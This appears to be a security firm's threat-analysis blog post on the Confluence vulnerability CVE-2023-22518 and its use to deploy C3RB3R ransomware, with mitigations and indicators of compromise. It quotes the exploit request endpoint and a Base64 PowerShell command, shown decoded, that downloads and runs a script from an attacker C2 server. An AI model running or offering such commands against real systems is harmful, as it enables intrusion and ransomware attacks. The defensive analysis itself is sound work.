CVE-2023-22518 and how it is used in recent Ransomware Attacks

2023-10-31
9 minutes

Introduction

On October 31^st, 2023, Atlassian published a security bulletin presenting an Improper Authorization vulnerability. It affects all versions of Confluence Data Center, and Confluence Server that are not hosted by Atlassian. Successful exploitation of this vulnerability allows a remote, unauthenticated attacker to create administrator accounts. Further, the attacker is able to reset the Confluence instance completely, affecting the Availability of the data, as there is no other way to retrieve the lost data apart from a backup.

The vulnerability tracked as CVE-2023-22518 initially received a CVSS score of 9.1. However, soon after (on November 6^th, 2023), Atlassian updated the score to 10.0, ranking it as ‘critical’ since the vulnerability was leveraged by threat actors to deploy the ‘C3RB3R’ Ransomware (for further information, see this article from Trendmicro).

Presenting CVE-2023-22518

The root cause of CVE-2023-22518 is a rights control fault in the ‘WebSudo’ module used in the affected Atlassian products. So, any remote, unauthenticated attacker can send specific web requests to take control of the Confluence instance. Note: Instances that are hosted by Atlassian, and thus accessed via an atlassian.net domain are not vulnerable.

The ‘WebSudo’ module was designed to support secure administrator sessions. When an administrator is logged in to Confluence and wants to call an administration function, the ‘WebSudo’ module will require the administrator to reenter his credentials. This works similar to the regular ‘sudo‘ command known from the Command Line Interface. When a normal user wants to execute a certain command with elevated privileges, he uses ‘sudo’. He will receive a prompt to enter the administrator’s password, if authenticated successfully, the command will be executed with elevated privileges.

Taking a closer look at the ‘WebSudo’ module, we can observe that specifically crafted web requests can bypass the authentication step. This allows an unauthorized user to execute critical system functions without having to authenticate as a privileged user. The following web request could be observed during active exploitation:

[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 193.176.179[.]41 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36

Where ‘/json/setup-restore.action?synchronous=true‘ represents the endpoint that should be protected by the ‘WebSudo’ module. However, in practice, this endpoint is publicly accessible, allowing anybody to call the underlying function. A proof-of-concept for this exploit was released on November 2nd, 2023.

For a more detailed explanation, we recommend checking out this article.

How is CVE-2023-22518 used to deploy Ransomware?

Upon release of the security bulletin October 31st, 2023, Atlassian stated that this vulnerability was not being ongoingly exploited. Soon after this would change as per the 5th of November, Rapid7 MDR started to see exploitation by the threat actor group ‘Storm-0062’ (also known as: ‘DarkShadow’, or ‘Oro0xly’) to deploy the ‘K3RB3R’ Ransomware on the Confluence server. The following exploitation steps could be observed:

Step 1: Gain initial access by exploiting CVE-2023-22518

This step is easily achieved by sending a specific web request to the ‘/json/setup-restore.action?synchronous=true’. When successful, the attacker will be able to create an administrator account.

Step 2: Run a Base64 PowerShell command

In the second step, the newly created administrator account is leveraged to execute the following Base64 encoded PowerShell command:

powershell.exe -exec bypass -nop -enc SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADcANgAuADEANwA5AC4ANAAxAC8AdABtAHAALgAzADcAIgApACkA

Encoding suspicious commands is a common technique used by attackers to avoid detection. After decoding, we can observe the following command:

powershell.exe -exec bypass -nop -enc IEX((New-Object Net.WebClient).DownloadString(hxxp://193.176[.]179[.]41/tmp.37))

Step 3: Download second PowerShell script from the C&C Server

The command from Figure 2 will connect to the Command-and-Control server (IP: 193.187.172.[.]41) to download a malicious script.

Figure 1: Malicious script downloaded from 193.187.172.[.]41 (Source: Trendmicro)

Analyzing this script, we can observe a second IP address: 193.187.172[.]73 . This IP is used to host the decimal-encoded C3RB3R payload.

Step 4: Download encoded C3RB3R payload

As seen before, the malicious script will download another malicious file, which once more is encoded to avoid detection.

Figure 2 Encoded File containing C3RB3R payload (Source: Trendmicro)

Figure 3: Encoded File containing the C3RB3R payload (Source: Trendmicro)

Step 5: Decode the payload

The payload will be decoded using the PowerShell script shown in Figure 3.

Step 6: Execute the decoded C3RB3R Ransomware payload

The last step, after decoding the C3RB3R payload, is to execute it. Once again, the PowerShell script from Figure 3 is used for that.

Successful execution of the decoded payload will encrypt all files on the victim’s system. Further, the file extension ‘.L0CK3D’ will be appended to all files, and the ransom note “read-me3.txt” will be dropped in all directories.

Attack Summary

In this Attack we can observe various techniques used by attackers. We see how important Defense Evasion is, since the success of K3RB3R heavily depends on the PowerShell command shown in step 2 remaining undetected. Defenders should have detection rules in place that detect encoded PowerShell commands, since there is basically no sense for a legit user to encode their commands.

Another interesting thing we can note: the attackers have set up two C2 (Command & Control) servers to host the tools used in their attack including the Ransomware itself. Using different C2 servers, attackers have higher chances to remain undetected, as the traffic from the victim’s machine to the attacker network is distributed over various connections. A common technique used by defenders is to blacklist malicious IP addresses, by using different C2 servers defenders have to identify all IP addresses to completely stop the attack.

With the use of Domain Generation Algorithms (DGA) attackers can switch swiftly to the next C2 one to keep attack continuity, constantly moving their infrastructure removing the Single Point of Failure, such that an accidental DDoS (Distributed Denial of Service), caused by too many victims trying to establish a connection to the C2 server, is effectively prevented.

Last but not least, C2 interaction can be characterized by the duration of the connection, which is longer than a legit connection. Attackers try to hide these special connections with decoy traffic (legit connections to websites such as: ‘bing[.]com’, ‘facebook[.]com’, etc.)

The interplay between the different techniques used by attackers finally paints following picture:

Figure 4 CVE-2023-22518 'K3RB3R' Attack stages (Source: Senthorus)

Impact

Threat actors who exploit CVE-2023-22518 can initiate a complete reset of the Confluence instance, wiping all its data in the process. It is of utmost importance to regularly backup the data in order to prevent complete data loss.

However, the attacker is not able to exfiltrate or modify any data; attacks only affect the Availability of the data.

A shodan search from the 9th of January 2024 shows that there are still more than 3,500 Confluence Instances vulnerable to CVE-2023-22518. When looking at which country has the most vulnerable instances the United States are leader of the list with more than 770 vulnerable insatances. Switzerland ranks 22nd with 21 vulnerable instances that could be observed.

Figure 5: Shodan search (9th of January 2024) vulnerable environments: ‘http.favicon.hash:-305179312’’ (Source: Senthorus)

Defending against CVE-2023-22518?

CVE-2023-22518 affects all versions of Confluence Data Center and Confluence Server. Just as with CVE-2023-22515, the vulnerability has no impact on Atlassian cloud websites accessed via the atlassian.net domain.

How to mitigate the vulnerability?

The security advisory from Atlassian points out that immediate actions should be taken to defend against the vulnerability.

Permanent mitigation

It is highly recommended to upgrade to one of the following fixed versions:

Product

Fixed Versions

Confluence Server and

Confluence Data Center

7.19.16

8.3.4

8.4.4

8.5.3

8.6.1

Temporary solution

If an immediate upgrade is not possible, the following temporary mitigations should be implemented:

Remove the vulnerable instance from the internet until the patch is implemented.
In the event that it’s not possible to remove the instance from the internet completely, it’s recommended to block access to the affected endpoints.
/json/setup-restore.action
/json/setup-restore-local.action
/json/setup-restore-progress.action

For further information, please refer to the security advisory from Atlassian.

Indicators of Compromise (IOCs)

Evidence of compromise may include:

Requests to ‘/json/setup-restore*’ in the network access logs
Encrypted files or corrupted data
Unexpected members of the confluence-admin group
IP addresses: 193.176.179[.]41 , 193.43.72[.]11 , 45.145.6[.]112 , 193.187.172[.]73
URL: j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion

Summary

The ease of exploitation, paired with the high number of instances potentially affected, quickly made CVE-2023-22518 popular among threat actors. We have shown a practical example of how this vulnerability is utilized to deploy C3RB3R Ransomware. Patching affected systems as soon as possible is highly recommended. And once more, we want to point out the importance of regularly backing up your data.

References

The author

Leo Duntze
SOC Analyst L1 at Senthorus
Leo Duntze is passionate about Cybersecurity.